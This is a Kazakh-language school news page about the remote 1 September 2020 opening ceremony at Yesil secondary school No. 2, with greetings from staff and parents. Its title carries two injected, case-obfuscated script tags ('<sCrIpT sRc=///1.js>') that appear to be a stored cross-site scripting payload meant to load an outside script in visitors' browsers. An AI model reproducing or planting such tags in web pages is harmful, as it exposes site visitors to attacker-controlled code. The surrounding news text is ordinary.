1 қыркүйек салтанатты жиын<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

01.09.2020

Есіл № 2 орта мектебінде мектеп оқушылары үшін алғашқы қоңырау соғылды.Салтанатты жиын 1-11 сынып оқушылары үшін қашықтықтан ұйымдастырылды. Оқушыларға Абайдың 175 жылдығы, Қазақстан Республикасының Конституциясына 25 жыл толуы туралы ақпарат дайындалды .

Бірінші қыркүйек-барлығына жақын мереке. Одан білім әлеміне қиын, бірақ өте қызықты жол басталады.

Мектеп директоры Челюбеева Е.Б. оқушыларды, ата-аналар мен мұғалімдерді оқу жылының басталуымен құттықтады. Мектеп меңгерушісі С. Т. Кожухова оқушылар мен ата-аналарды кезекші сыныптардың жұмыс режимімен, 2020-2021 оқу жылында Қашықтықтан оқытудың жұмыс режимімен таныстырды.

1 сынып оқушыларының ата-аналарынан құттықтау сөздер айтылды. 1 "б" сынып жетекшісі Байкова Альбина Туктамышевна оқушыларды, ата - аналар мен мұғалімдерді оқу жылының басталуымен құттықтады.

Сіздерге зор денсаулық, отбасыларыңызға амандық тілеймін! Жаңа оқу жылы баршаға қызықты және жемісті болсын, ашылулар мен жаңа жетістіктерге қуаныш әкелсін!

   

 

Просмотров: 886


Пікір қосу



Деректерді қолтаңбаға қосу